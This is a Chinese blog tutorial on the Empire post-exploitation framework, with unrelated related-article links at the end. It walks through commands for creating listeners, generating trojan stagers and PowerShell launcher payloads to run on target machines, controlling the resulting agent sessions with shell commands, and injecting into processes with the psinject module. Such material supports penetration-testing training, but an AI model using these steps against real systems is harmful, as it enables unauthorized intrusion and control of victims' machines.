【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)

简介: 基本命令:(##注意Empire下命令区分大小写##)

一、基本命令:(##注意Empire下命令区分大小写##)

1、启动Empire后,首先查看一下命令帮助信息


help




二、设置监听器:

与coblatstrike类似,也是要先创建Linstener,然后后续操作选择生成的监听器即可,与CS不同的是:当开启多个监听时,必须使用不同的名称、不同的端口


1、进入listeners界面:


listeners


查看命令帮助


help



2、创建Listener:

uselistener命令,可以通过空格+双击tab键,看到一共有7种Listener,一般常用的是:http、http_foreign、meterpreter、redirector,其他的不怎么用


创建Listener:

①选择监听器类型


uselistener <监听器类型>


②查看所需配置


info


③设置相关配置并启动监听





set Name <自定义名称>set Host <服务器ip>set Port <监听端口>execute    #执行监听器


back返回listeners界面即可看到监听器列表


list


④删除监听器


kill <监听器名称>



三、生成木马stagers:

在listeners界面下操作,通过usestager,空格+双击tab键可以看到支持的所有stagers,


multi是通用模块、osx是mac操作系统、然后就是windows的模块


①生成stager:


usestager <模块名称>
set listener <监听器名称>
execute    #执行生成


然后会在/tmp/目录下生成木马文件,在目标主机运行就会上线



②使用launcher命令:


launcher <语言> <监听器名称>


将生成的这段payload在有powershell的目标机上执行,就会上线



③操作agents(会话):

1.查看会话列表:


agents    #相当于msf的sessions命令


重命名agents:


rename <会话名称> <新的名称>


2.进入会话:


interact <会话名称>


back命令就可以实现将会话放置后台了



3.杀死会话:



kill <会话名称>  先执行remove <会话名称>   再执行



4.agents具体命令操作:

很多命令和MSF的meterpreter会话操作差不多


常用命令:


help agentcmds


执行cmd命令:


shell +命令


四、进程注入:


ps    #查看进程PID


注入进程:



usemodule management/psinject
set ProcId
set Listener <监听器名称>
execute


注入成功会返回一个新的agent会话


目录
相关文章
|
6月前
|
监控 Linux 应用服务中间件
探索Linux中的`ps`命令:进程监控与分析的利器
探索Linux中的`ps`命令:进程监控与分析的利器
136 13
|
2月前
|
运维 监控 Java
使用jps命令查看Java进程
`jps`是Java开发者和系统管理员的得力助手,它简化了Java进程监控的过程,使得快速检查应用运行状态变得轻而易举。通过合理利用其提供的参数,可以高效地进行故障排查、性能监控及日常管理任务,确保Java应用稳定运行。
93 2
|
4月前
|
网络协议
Mac根据端口查询进程id的命令
这篇文章介绍了在Mac操作系统上如何使用两种命令来查询监听特定端口的进程ID。第一种方法是使用`netstat -anp tcp -v | grep 端口号`,例如`netstat -anp tcp -v | grep 80`,这将列出所有使用端口80的TCP连接及其相关信息。第二种方法是使用`lsof -P -n -i:端口号`,例如`lsof -P -n -i:8080`,这将显示使用指定端口的进程列表,包括进程ID、用户、文件描述符等信息。文章通过示例展示了如何使用这些命令,并提供了输出结果的截图。
349 2
|
4月前
|
Java Windows
【Azure Developer】Windows中通过pslist命令查看到Java进程和线程信息,但为什么和代码中打印出来的进程号不一致呢?
【Azure Developer】Windows中通过pslist命令查看到Java进程和线程信息,但为什么和代码中打印出来的进程号不一致呢?
|
5月前
|
Java 运维
开发与运维命令问题之使用jstack命令查看Java进程的线程栈如何解决
开发与运维命令问题之使用jstack命令查看Java进程的线程栈如何解决
70 2
|
5月前
|
小程序 Linux
【编程小实验】利用Linux fork()与文件I/O:父进程与子进程协同实现高效cp命令(前半文件与后半文件并行复制)
这个小程序是在文件IO的基础上去结合父子进程的一个使用,利用父子进程相互独立的特点实现对数据不同的操作
121 2
|
5月前
|
Linux 数据处理 调度
深入探索Linux的renice命令:优化进程优先级
`renice`命令在Linux中用于调整运行进程的优先级,范围-20(最高)至19(最低)。它可以实时改变进程的优先级,无需重启,支持按PID、进程组或用户批量修改。例如,`renice -n 10 -p 1234`将PID为1234的进程优先级设为10。使用时要注意不要滥用高优先级,避免频繁修改,了解系统负载,并记录变更,通常需root权限。
|
6月前
|
Web App开发 运维 监控
深入探索Linux命令pwdx:揭秘进程工作目录的秘密
`pwdx`命令在Linux中用于显示指定进程的工作目录,基于`/proc`文件系统获取实时信息。简单易用,如`pwdx 1234`显示PID为1234的进程目录。结合`ps`和`pgrep`等命令可扩展使用,如查看所有进程或特定进程(如Firefox)的目录。使用时注意权限、进程ID的有效性和与其他命令的配合。查阅`man pwdx`获取更多帮助。
|
6月前
|
缓存 监控 安全
Linux top命令详解:持续监听进程运行状态
Linux top命令详解:持续监听进程运行状态
157 3
|
6月前
|
开发框架 安全 .NET
【权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
【权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令